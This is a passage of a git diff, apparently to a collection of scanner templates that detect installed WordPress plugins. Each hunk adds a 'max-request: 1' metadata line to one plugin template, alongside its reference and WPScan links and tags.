+ http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 